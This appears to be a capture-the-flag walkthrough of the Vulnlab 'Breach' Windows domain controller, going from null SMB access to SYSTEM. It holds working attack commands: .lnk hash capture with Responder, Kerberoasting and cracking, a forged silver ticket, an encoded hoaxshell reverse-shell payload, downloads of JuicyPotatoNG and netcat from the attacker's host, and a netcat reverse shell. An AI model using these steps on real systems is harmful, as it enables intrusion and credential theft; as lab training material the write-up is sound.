Overview#
- Platform: Vulnlab
- Difficulty: Medium
- OS: Windows
- Skills: Active Directory, privilege escalation, mssql
Assumed Breach Credentials: No assumed breach
Reconnaissance#
Nmap Scan#
sudo nmap -sC -sV -p- -T4 $IP -vv
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-10-09 18:17:27Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 10.10.72.195:1433:
| Target_Name: BREACH
| NetBIOS_Domain_Name: BREACH
| NetBIOS_Computer_Name: BREACHDC
| DNS_Domain_Name: breach.vl
| DNS_Computer_Name: BREACHDC.breach.vl
| DNS_Tree_Name: breach.vl
|_ Product_Version: 10.0.20348
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
|
| ms-sql-info:
| 10.10.72.195:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_ssl-date: 2025-10-09T18:18:56+00:00; +1m58s from scanner time.
3269/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: BREACH
| NetBIOS_Domain_Name: BREACH
| NetBIOS_Computer_Name: BREACHDC
| DNS_Domain_Name: breach.vl
| DNS_Computer_Name: BREACHDC.breach.vl
| DNS_Tree_Name: breach.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-10-09T18:18:16+00:00
| ssl-cert: Subject: commonName=BREACHDC.breach.vl
| Issuer: commonName=BREACHDC.breach.vl
|_ssl-date: 2025-10-09T18:18:56+00:00; +1m59s from scanner time.
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Add breach.vl and breachdc.breach.vl to /etc/hosts
First, we can check smb for null authentication, see if we can read or write to any shares.
crackmapexec smb 10.10.81.20 -u 'f' -p '' --shares
SMB 10.10.81.20 445 BREACHDC [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:False)
SMB 10.10.81.20 445 BREACHDC [+] breach.vl\f:
SMB 10.10.81.20 445 BREACHDC [+] Enumerated shares
SMB 10.10.81.20 445 BREACHDC Share Permissions Remark
SMB 10.10.81.20 445 BREACHDC ----- ----------- ------
SMB 10.10.81.20 445 BREACHDC ADMIN$ Remote Admin
SMB 10.10.81.20 445 BREACHDC C$ Default share
SMB 10.10.81.20 445 BREACHDC IPC$ READ Remote IPC
SMB 10.10.81.20 445 BREACHDC NETLOGON Logon server share
SMB 10.10.81.20 445 BREACHDC share READ,WRITE
SMB 10.10.81.20 445 BREACHDC SYSVOL Logon server share
SMB 10.10.81.20 445 BREACHDC Users READ
Seems we can null authenticate, read some shares and even write to one of them. Since we dont have breached credentials to access any of the services running on the box, or run bloodhound - our foothold could be through this writeable share.
Whenever i see i can write to a share, i first try the netexec slinky module, which puts .lnk files redirecting to our local share location in order to grab hashes. We can then catch these hashes with responder.
nxc smb breach.vl -u test -p '' -M slinky -o name=beejay server=10.8.7.149
SMB 10.10.81.20 445 BREACHDC [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.10.81.20 445 BREACHDC [+] breach.vl\test: (Guest)
SMB 10.10.81.20 445 BREACHDC [*] Enumerated shares
SMB 10.10.81.20 445 BREACHDC Share Permissions Remark
SMB 10.10.81.20 445 BREACHDC ----- ----------- ------
SMB 10.10.81.20 445 BREACHDC ADMIN$ Remote Admin
SMB 10.10.81.20 445 BREACHDC C$ Default share
SMB 10.10.81.20 445 BREACHDC IPC$ READ Remote IPC
SMB 10.10.81.20 445 BREACHDC NETLOGON Logon server share
SMB 10.10.81.20 445 BREACHDC share READ,WRITE
SMB 10.10.81.20 445 BREACHDC SYSVOL Logon server share
SMB 10.10.81.20 445 BREACHDC Users READ
SLINKY 10.10.81.20 445 BREACHDC [+] Found writable share: share
SLINKY 10.10.81.20 445 BREACHDC [+] Created LNK file on the share share
Note that after starting Responder, you wont get an initial callback even waiting for some time, this is because the slinky module puts the .lnk file in the share root location, but if there are more directories in that share, it wont detect them.
Therefore, go into “share” and get that .lnk file, move do the other directories in the share and put it in them manually, then start responder.
sudo responder -I tun0 -v
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.8.7.149]
Responder IPv6 [fe80::ff8b:1180:777f:3c81]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
Don't Respond To MDNS TLD ['_DOSVC']
TTL for poisoned response [default]
[+] Current Session Variables:
Responder Machine Name [WIN-CF23CVPX6EP]
Responder Domain Name [JASG.LOCAL]
Responder DCE-RPC Port [47264]
[*] Version: Responder 3.1.7.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>
[*] To sponsor Responder: https://paypal.me/PythonResponder
[+] Listening for events...
[!] Error starting TCP server on port 389, check permissions or other servers running.
[SMB] NTLMv2-SSP Client : 10.10.81.20
[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong
[SMB] NTLMv2-SSP Hash : Julia.Wong::BREACH:944eb9e9f43e1dd2:D49DE050C3F4525E8B379E57E5064EA7:01010000000000000039C8CBB639DC019B2CD8CA95C052A900000000020008004A0041005300470001001E00570049004E002D004300460032003300430056005000580036004500500004003400570049004E002D00430046003200330043005600500058003600450050002E004A004100530047002E004C004F00430041004C00030014004A004100530047002E004C004F00430041004C00050014004A004100530047002E004C004F00430041004C00070008000039C8CBB639DC01060004000200000008003000300000000000000001000000002000007698A398C70DDDE7F165AED6A20492E8F09329AE304EEF9DD622AEE223575F3F0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E0038002E0037002E003100340039000000000000000000
We got a hash for the user julia.wong, we used john to crack it
Now lets enumerate our user:
smbclient -U 'julia.wong' //breach.vl/share
Password for [WORKGROUP\julia.wong]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Oct 10 07:27:41 2025
.. DHS 0 Thu Feb 17 15:38:00 2022
beejay.lnk A 946 Fri Oct 10 07:26:22 2025
finance D 0 Thu Feb 17 11:19:34 2022
software D 0 Thu Feb 17 11:19:12 2022
transfer D 0 Fri Oct 10 07:26:57 2025
7863807 blocks of size 4096. 2618345 blocks available
smb: \> cd transfer\
smb: \transfer\> ls
. D 0 Fri Oct 10 07:26:57 2025
.. D 0 Fri Oct 10 07:27:41 2025
beejay.lnk A 946 Fri Oct 10 07:26:57 2025
claire.pope D 0 Thu Feb 17 11:21:35 2022
diana.pope D 0 Thu Feb 17 11:21:19 2022
julia.wong D 0 Thu Feb 17 11:24:39 2022
7863807 blocks of size 4096. 2617763 blocks available
smb: \transfer\> cd julia.wong\
smb: \transfer\julia.wong\> ls
. D 0 Thu Feb 17 11:24:39 2022
.. D 0 Fri Oct 10 07:26:57 2025
local.txt A 36 Thu Feb 17 11:25:02 2022
7863807 blocks of size 4096. 2614416 blocks available
You’ll find this user has access to the same shares as before, but we can use her credentials to access her personal directory in the user share, gaining the user flag
lets see if we can access mssql:
impacket-mssqlclient julia.wong:'Computer1'@10.10.81.20 -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (BREACH\Julia.Wong guest@master)> SELECT name FROM master..sysdatabases;
name
------
master
tempdb
model
msdb
SQL (BREACH\Julia.Wong guest@master)> enable_xp_cmdshell
ERROR(BREACHDC\SQLEXPRESS): Line 105: User does not have permission to perform this action.
SQL (BREACH\Julia.Wong guest@master)> enum_logins
name type_desc is_disabled sysadmin securityadmin serveradmin setupadmin processadmin diskadmin dbcreator bulkadmin
------------- ------------- ----------- -------- ------------- ----------- ---------- ------------ --------- --------- ---------
sa SQL_LOGIN 1 1 0 0 0 0 0 0 0
BUILTIN\Users WINDOWS_GROUP 0 0 0 0 0 0 0 0 0
SQL (BREACH\Julia.Wong guest@master)> enum_impersonate
execute as database permission_name state_desc grantee grantor
---------- -------- --------------- ---------- ------- -------
Nothing useful for us since we cant enable xp_cmdshell and nothing useful in the file system when enumerating xp_dirtree..
Lets run bloodhound and see if our user can do anything special:
our user doesnt have any outbound permissions, but there is a kerberoastable user - svc_mssql - perhaps we can kerberoast this user and then use it to elevate our privileges within mssql, lets try.
impacket-GetUserSPNs -outputfile kerberoastables.txt -dc-ip 10.10.81.20 'breach.vl/julia.wong:Computer1'
$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$373a843a60378b2d5b0a7915d6c4d90e$8fa569e98bd9e10ee16988c20176da774f8d8e0b20740bb279d41b073978644355894dc2e78dfcf5de3a25c19c129866657fdf5db54440ce1129fec7bfb2e6076420b702bdbd9dc07c1f9623c39291016d50bc4a6892e6bd365507d53a7c2aff4d7bb0c6436bb8fa5a8646354b5aed16d18dbc72637f0938d5e23ea05ce6e33f3df2beaca41f4081fa794b6bd2f94a22c8f081a51a00c6f5fa9c7a0bf6fa58583b17c0ee32b36cff246c35269399ddbee5777ab8ed042b421a1e56d627f69a464bfb835dc810ae6fa97d9886b856d217800fde774e1c2b8cc42c94e8520394dc6ff1a5f3fa17f9ea986b16759f776a2fb7ba7c10c6be200c1518ff77240d1f311765f2937143b988e7ddd410731f33e323233fbafefe0ac98078db3878cdeea18014827757932f44b0a08715eb4fbcbcb40f70105b05a531b13265fd52fed95d37a5e38591545e0f48d047e2f7e14101b9c1885965971871b96cda5c134ca02171f6c9df76869bc2fb94409043ade4a06a7074e35ea7bb0816ee83fbc318cbb2b7f58d1963d6c9092ec2a6370be1dda3b53b3f5aa2ad45346bf12e1fe41d74907a7523db03a282f718d24ccb74ea1d7aa975fb14c42f5a1a89ca5eceb0d4d6e5f601e785957ef3d322f6b031a3db8510f1c1858621750aeae677606a479e93113ed04fa5902344f5898e3ff72efadf4869ebff040d9a237c0908817eccbd5a7f3811df9e5705f59cacb43999150f790e3cc5bfbf3f6f41c1604ad75f9e026f2749614e9a090acd36e602d379b0109d12d1edd2cc395b6f6aa5fc0ae6453455a13351df33c0e53e55d0d578f4c52dddb09aad7d242b7eeebeeedd4b1dfc38b7bf5e78c5960bd9bc0eef72cbab88daac51ffd6f7809012072214ad7984c945b5c9d43ea06375adb4cebf11661884108928036cdeb668118465733336e7e9fd8463c3acf316ae74a02d01301102d88efdba4c9a0ea75ab6fd8a4c6d7ebff416fd5097019bb43ca316e08799305e4087a5b8b51d9f7db43e43ba2463758a7fff22c217a32a231f20946d127ac3a8d4b4860b2120f04c9d9e66b1dc914c336ae8d00883a30b3478d28a2b945df5cad20865b2cab42659b38bfcbf792c4122b954e6679bddb8785a72ce6559b5cdde82b7bddbf475a91ccb70372422ab32b6215a635c456592115f860fce350dd4b7bdee7a247898953b3d2212d222f836ee3ce3c75441960186d93ae976792a5bc3a7fa2a005b31aad3a95c050a6d0749e78d54e373e2d4e2760641b536b63fee61d30cae8a3cb33d451d073b585a698bca4d64e984c6c6a6479c02c5192a7521b4322efd71dca4ce9fc6ea29eaaa9c5b96e6f215a6f32ef4f34339c6e028de786a8e3003ae0b78883f6be753c5aad027b138c24867c2be3c40ea3e3e2c4ac6dd1c90d195145ea39c316b2c753554d9dcb4900f1e5612e57aa0cdaab1a5b3aefd345c81d0246c6d190f
*crack*
john hash1.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Trustno1 (?)
1g 0:00:00:00 DONE (2025-10-10 07:46) 10.00g/s 522240p/s 522240c/s 522240C/s patitos..lili12
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
now we own the user svc_mssql, lets see if we have xp_cmdshell access within mssql:
SQL (BREACH\svc_mssql guest@master)> enable_xp_cmdshell
ERROR(BREACHDC\SQLEXPRESS): Line 105: User does not have permission to perform this action.
ERROR(BREACHDC\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(BREACHDC\SQLEXPRESS): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
ERROR(BREACHDC\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
Hmm, okay. we can try something i have recently learned: a silver ticket attack.
A Silver Ticket Attack is a Kerberos-based attack where an attacker forges a service ticket (TGS) instead of the TGT (Ticket Granting Ticket). This allows unauthorized access to a specific service without needing to communicate with the Domain Controller (KDC). Since Silver Tickets are generated offline and don’t require KDC validation, they can be harder to detect compared to Golden Ticket Attacks. After forging the Silver Ticket, we pass it to the target service, which gives us elevated access. From there, we’ll execute MSSQL commands with higher permissions — and finally, drop a reverse shell.
For this we will need to get the NTLM hash of our user, since we have the password already, this step is easy:
iconv -f ASCII -t UTF-16LE <(printf "Trustno1") | openssl dgst -md4
MD4(stdin)= 69596c7aa1e8daee17f8e78870e25a5c
Then, get the ticket: (the spn i used was the one set for the user itself, can check in bloodhound)
impacket-ticketer -nthash '69596c7aa1e8daee17f8e78870e25a5c' -domain-sid 'S-1-5-21-2330692793-3312915120-706255856' -domain 'breach.vl' -spn 'MSSQLSvc/breachdc.breach.vl:1433' 'svc_mssql'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for breach.vl/svc_mssql
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in svc_mssql.ccache
export KRB5CCNAME=svc_mssql.ccache
┌──(kali㉿kali)-[~/vulnlab/machines/breach]
└─$ klist
Ticket cache: FILE:svc_mssql.ccache
Default principal: svc_mssql@BREACH.VL
Valid starting Expires Service principal
10/10/2025 08:47:34 10/08/2035 08:47:34 MSSQLSvc/breachdc.breach.vl:1433@BREACH.VL
renew until 10/08/2035 08:47:34
Now lets use the ticket to access mssql, and it should be elevated
impacket-mssqlclient -no-pass -k breach.vl/svc_mssql@breachdc.breach.vl
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (BREACH\Administrator dbo@master)> enable_xp_cmdshell
INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\Administrator dbo@master)> xp_cmdshell whoami
output
----------------
breach\svc_mssql
Okay for the most annoying part of this box, bypassing the obnoxious AV that was present on it…
I tried many payloads with xp_cmdshell, the only one or the first one that worked for me was using Hoaxshell to get a shell.
hoaxshell -s 10.8.7.149 -p 4444 -H "Authorization"
┬ ┬ ┌─┐ ┌─┐ ─┐ ┬ ┌─┐ ┬ ┬ ┌─┐ ┬ ┬
├─┤ │ │ ├─┤ ┌┴┬┘ └─┐ ├─┤ ├┤ │ │
┴ ┴ └─┘ ┴ ┴ ┴ └─ └─┘ ┴ ┴ └─┘ ┴─┘ ┴─┘
by t3l3machus
[Info] Generating reverse shell payload...
powershell -e JABzAD0AJwAxADAALgA4AC4ANwAuADEANAA5ADoANAA0ADQANAAnADsAJABpAD0AJwA5ADEAMQBjADkANwBhADgALQAwADYANgAyADIAOQAxADgALQAwADcANAAzAGEAOAAxADkAJwA7ACQAcAA9ACcAaAB0AHQAcAA6AC8ALwAnADsAJAB2AD0ASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIAAkAHAAJABzAC8AOQAxADEAYwA5ADcAYQA4ACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAQQB1AHQAaABvAHIAaQB6AGEAdABpAG8AbgAiAD0AJABpAH0AOwB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAJABjAD0AKABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACAALQBVAHIAaQAgACQAcAAkAHMALwAwADYANgAyADIAOQAxADgAIAAtAEgAZQBhAGQAZQByAHMAIABAAHsAIgBBAHUAdABoAG8AcgBpAHoAYQB0AGkAbwBuACIAPQAkAGkAfQApAC4AQwBvAG4AdABlAG4AdAA7AGkAZgAgACgAJABjACAALQBuAGUAIAAnAE4AbwBuAGUAJwApACAAewAkAHIAPQBpAGUAeAAgACQAYwAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwB0AG8AcAAgAC0ARQByAHIAbwByAFYAYQByAGkAYQBiAGwAZQAgAGUAOwAkAHIAPQBPAHUAdAAtAFMAdAByAGkAbgBnACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAHIAOwAkAHQAPQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABwACQAcwAvADAANwA0ADMAYQA4ADEAOQAgAC0ATQBlAHQAaABvAGQAIABQAE8AUwBUACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAQQB1AHQAaABvAHIAaQB6AGEAdABpAG8AbgAiAD0AJABpAH0AIAAtAEIAbwBkAHkAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGUAKwAkAHIAKQAgAC0AagBvAGkAbgAgACcAIAAnACkAfQAgAHMAbABlAGUAcAAgADAALgA4AH0A
Copied to clipboard!
[Info] Type "help" to get a list of the available prompt commands.
[Info] Http Server started on port 4444.
[Important] Awaiting payload execution to initiate shell session...
[Shell] Payload execution verified!
[Shell] Stabilizing command prompt...
PS C:\Windows\system32 > cd /
PS C:\ > cd users
PS C:\users > cd svc_mssql
PS C:\users\svc_mssql > cd desktop
PS C:\users\svc_mssql\desktop > whoami /all
USER INFORMATION
----------------
User Name SID
================ =============================================
breach\svc_mssql S-1-5-21-2330692793-3312915120-706255856-1115
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ =============================================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT SERVICE\MSSQL$SQLEXPRESS Well-known group S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133 Enabled by default, Enabled group, Group owner
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
we see the SeImpersonatePrivilege present which only means one thing… POTATO!
but… again the AV proved to be the most annoying part of this box.
Now we need to get JuicyPotatoNG and Netcat on the box, here are the methods i used:
Invoke-WebRequest -Uri http://10.8.7.149/JuicyPotatoNG.exe -OutFile C:\Windows\Temp\JuicyPotatoNG.exe
wget -usebasicparsing http://10.8.7.149/nc64.exe -o nc64.exe
Then perform the attack -
.\JuicyPotatoNG.exe -p "C:\users\svc_mssql\nc64.exe" -a "-e cmd.exe 10.8.7.149 443" -t *
PS C:\Windows\system32 > whoami
NT\authority system